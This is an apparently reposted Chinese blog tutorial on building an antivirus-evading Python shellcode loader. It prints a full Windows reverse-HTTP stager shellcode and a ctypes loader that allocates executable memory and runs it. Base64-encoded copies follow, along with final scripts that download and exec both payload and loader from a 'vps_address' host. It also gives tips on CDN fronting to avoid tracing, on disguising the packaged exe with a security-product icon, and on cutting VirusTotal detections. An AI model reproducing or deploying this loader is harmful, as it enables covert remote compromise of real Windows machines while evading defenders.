TFceGY4XHg3OFx4NjRceDRkXHhlNVx4OTNceDBkXHg3ZFx4Y2VceGFjXHg2M1x4NmZceDA2XHg0Mlx4MGRceDE4XHhhMlx4NWVceDAxXHhiM1x4ODdceGNkXHgxZFx4OGVceGQ0XHgwYlx4MTlceGU4XHhkN1x4Y2FceDlmXHg4M1x4YWFceGE4XHg0Ylx4NzVceDQ1XHg2Mlx4OTNceDU1XHhmMlx4MmNceGI3XHhlOVx4MmZceGQ4XHg3OFx4MzhceDY0XHgyMVx4YmRceDVlXHhlYlx4MTFceGQzXHgzOFx4YWFceDFmXHg1Y1x4MzRceGQ0XHgwNFx4OGNceGVjXHgxOFx4NDRceDVmXHg0Nlx4NDBceDY1XHg1Ylx4NjdceGVjXHhkMVx4MzlceDY2XHg5ZFx4ODlceDljXHg0N1x4ZGVceDllXHhlOVx4MDBceDQxXHhiZVx4ZjBceGI1XHhhMlx4NTZceGZmXHhkNVx4NDhceDMxXHhjOVx4YmFceDAwXHgwMFx4NDBceDAwXHg0MVx4YjhceDAwXHgxMFx4MDBceDAwXHg0MVx4YjlceDQwXHgwMFx4MDBceDAwXHg0MVx4YmFceDU4XHhhNFx4NTNceGU1XHhmZlx4ZDVceDQ4XHg5M1x4NTNceDUzXHg0OFx4ODlceGU3XHg0OFx4ODlceGYxXHg0OFx4ODlceGRhXHg0MVx4YjhceDAwXHgyMFx4MDBceDAwXHg0OVx4ODlceGY5XHg0MVx4YmFceDEyXHg5Nlx4ODlceGUyXHhmZlx4ZDVceDQ4XHg4M1x4YzRceDIwXHg4NVx4YzBceDc0XHhiNlx4NjZceDhiXHgwN1x4NDhceDAxXHhjM1x4ODVceGMwXHg3NVx4ZDdceDU4XHg1OFx4NThceDQ4XHgwNVx4MDBceDAwXHgwMFx4MDBceDUwXHhjM1x4ZThceDlmXHhmZFx4ZmZceGZmXHgzMVx4MzlceDMyXHgyZVx4MzFceDM2XHgzOFx4MmVceDM4XHgyZVx4MzRceDM4XHgwMFx4MTlceDY5XHhhMFx4OGQi
上傳vps:
訪問測驗(域名最好做CDN,防溯源):
2.2 改寫shellcode loader
改寫shellcode Loadder:
將前面的
shellcode = b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xb3\x15\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x4f\x6c\x69\x39\x00\xea\xf8\x43\x38\x93\xe8\x36\x73\xce\x2f\x3b\x08\x6f\xa9\x7e\x11\xdc\x18\xf8\x71\x43\xe2\x0f\x92\xd7\x3e\xd6\xac\xfc\xab\x59\x15\xd9\xdc\x48\x2c\x76\xc9\x3c\x19\x77\xbe\x4f\x57\xbf\xe0\x17\xfb\x7b\x1f\x0f\xd5\xc3\x89\x12\x37\x8b\xe7\x37\x80\xd8\x2c\x96\x7c\xb8\x08\x0e\xf1\x37\x48\x15\x9e\xa8\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x37\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x34\x2e\x30\x29\x0d\x0a\x00\x67\x8d\x04\x19\x98\x95\x99\x3d\x2f\x9e\x37\xab\x27\x74\x98\xe8\xc9\x1e\x06\xce\x89\x67\xcd\x7d\x63\xb1\x88\x6f\xdc\xee\x0f\xf2\x32\xa0\xf4\x0e\xf6\xcf\xc5\x60\x0c\x1d\xcb\x29\xfc\xd7\xc2\xfa\xba\x59\xdf\x1a\x04\xd3\xc5\x20\xcd\xed\x18\x6e\xe9\xa1\xe8\xad\xa7\x7f\xf2\x97\xab\x8b\x54\x19\xe3\x85\x19\x80\x33\x88\xf1\x68\x54\x7a\xcb\x8b\xf1\x5e\xf9\x80\x59\xd1\x4d\x4e\x41\x0a\xcc\xe0\x3b\x5a\xb4\x50\x30\xbe\xc0\xa5\xa3\x74\xbf\x36\xbb\xc5\xee\x1c\x1a\x3c\x25\xb0\x0e\x78\xa7\xa9\x6d\x16\xce\x32\x17\x7b\x9c\x0d\x44\x5e\x3e\xc5\x7d\x7c\xba\xb0\x83\x34\x31\xcd\xcc\x11\xf8\x78\x64\x4d\xe5\x93\x0d\x7d\xce\xac\x63\x6f\x06\x42\x0d\x18\xa2\x5e\x01\xb3\x87\xcd\x1d\x8e\xd4\x0b\x19\xe8\xd7\xca\x9f\x83\xaa\xa8\x4b\x75\x45\x62\x93\x55\xf2\x2c\xb7\xe9\x2f\xd8\x78\x38\x64\x21\xbd\x5e\xeb\x11\xd3\x38\xaa\x1f\x5c\x34\xd4\x04\x8c\xec\x18\x44\x5f\x46\x40\x65\x5b\x67\xec\xd1\x39\x66\x9d\x89\x9c\x47\xde\x9e\xe9\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x38\x2e\x34\x38\x00\x19\x69\xa0\x8d"
直接寫shellcode,改為:
base_64_shellcode = requests.get("http://vps_address/code/1.txt", timeout=10).text
# 從vps獲取加密后的shellcode
shellcode = eval(base64.b64decode(base_64_shellcode).decode('utf-8'))
# 解密并轉為十六進制
實作shellcode分離,
2.3 shellcode 分離后shellcode loader腳本上線測驗
測驗分離shellcode后的腳本是否能上線:
成功上線:
2.4 shellcode 分離后,使用pyinstaller生成exe檔案上線測驗
打包為exe測驗是否能成功上線:
pyinstaller -w -F Loader4.py -i 360.ico -n test2.exe
成功上線:
2.5 VT查殺率:14/67
已經比shellcode分離前好很多了,能不能再好點?
思路:既然shellcode能分離,為什么不把shellcode loader也分離了,
3. ShellCode 及ShellCoder 的分離
3.1 改寫shellcode loader
將
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
改寫為一條陳述句:
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64;ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40));buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode);ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)));handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)));ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
base64加密:
Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MucmVzdHlwZSA9IGN0eXBlcy5jX3VpbnQ2NDtwdHIgPSBjdHlwZXMud2luZGxsLmtlcm5lbDMyLlZpcnR1YWxBbGxvYyhjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludChsZW4oc2hlbGxjb2RlKSksIGN0eXBlcy5jX2ludCgweDMwMDApLGN0eXBlcy5jX2ludCgweDQwKSk7YnVmID0gKGN0eXBlcy5jX2NoYXIgKiBsZW4oc2hlbGxjb2RlKSkuZnJvbV9idWZmZXIoc2hlbGxjb2RlKTtjdHlwZXMud2luZGxsLmtlcm5lbDMyLlJ0bE1vdmVNZW1vcnkoY3R5cGVzLmNfdWludDY0KHB0ciksIGJ1ZiwgY3R5cGVzLmNfaW50KGxlbihzaGVsbGNvZGUpKSk7aGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoY3R5cGVzLmNfaW50KDApLCBjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX3VpbnQ2NChwdHIpLCBjdHlwZXMuY19pbnQoMCksIGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLnBvaW50ZXIoY3R5cGVzLmNfaW50KDApKSk7Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGN0eXBlcy5jX2ludChoYW5kbGUpLCBjdHlwZXMuY19pbnQoLTEpKQ==
上傳vps,并訪問測驗:
再次改寫源代碼后,關鍵代碼僅為6行:
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2021/10/24 18:05
# @Author : AA8j
# @Site :
# @File : Loader4.py
# @Software: PyCharm
# @Blog : https://blog.csdn.net/qq_44874645
import base64
import ctypes
import requests
base_64_shellcode = requests.get("http://vps_address/code/1.txt", timeout=10).text
# 獲取base64加密的shellcode
shellcode = eval(base64.b64decode(base_64_shellcode).decode('utf-8'))
# 將shellcode解密并轉換為十六進制
shellcode = bytearray(shellcode)
base_64_shellcode_loader = requests.get("http://vps_address/code/2.txt", timeout=10).text
# 獲取加密的shellcode loader
shellcode_loader = base64.b64decode(base_64_shellcode_loader).decode('utf-8')
# 解密shellcode loader
exec(shellcode_loader)
# 執行shellcode loader
再過分點,,,追求極致的話,最終關鍵代碼只有兩行:
import base64
import ctypes
import requests
shellcode = bytearray(eval(base64.b64decode(requests.get("http://vps_address/code/1.txt", timeout=10).text).decode('utf-8')))
exec(base64.b64decode(requests.get("http://vps_address/code/2.txt", timeout=10).text).decode('utf-8'))
3.2 shellcode和shellcode loader均分離后,兩行代碼的腳本上線測驗
成功上線:
3.3 使用pyinstaller生成exe檔案上線測驗
成功上線:
3.4 VT查殺率:10/68
bypass國內AV足以,
參考文章:
https://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247486638&idx=1&sn=99ce07c365acec41b6c8da07692ffca9&chksm=ea37f3f4dd407ae28611d23b31c39ff1c8bc79762bfe2535f12d1b9d7a6991777b178a89b308&mpshare=1&scene=23&srcid=1023DVtA1pojG9u9T1BYyZXO&sharer_sharetime=1635002636740&sharer_shareid=4590fc5f03636a9b79d352885e22ea93#rd
https://mp.weixin.qq.com/s?__biz=MzIwOTMzMzY0Ng==&mid=2247484538&idx=1&sn=a23fec3cad596102d30a99bad6c27b85&chksm=9774389ba003b18d5428ed6f75490b8cda7f9dcae2e9726ad42ac2d939794c103a7f561f905e&scene=21#wechat_redirect
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/336173.html
標籤:其他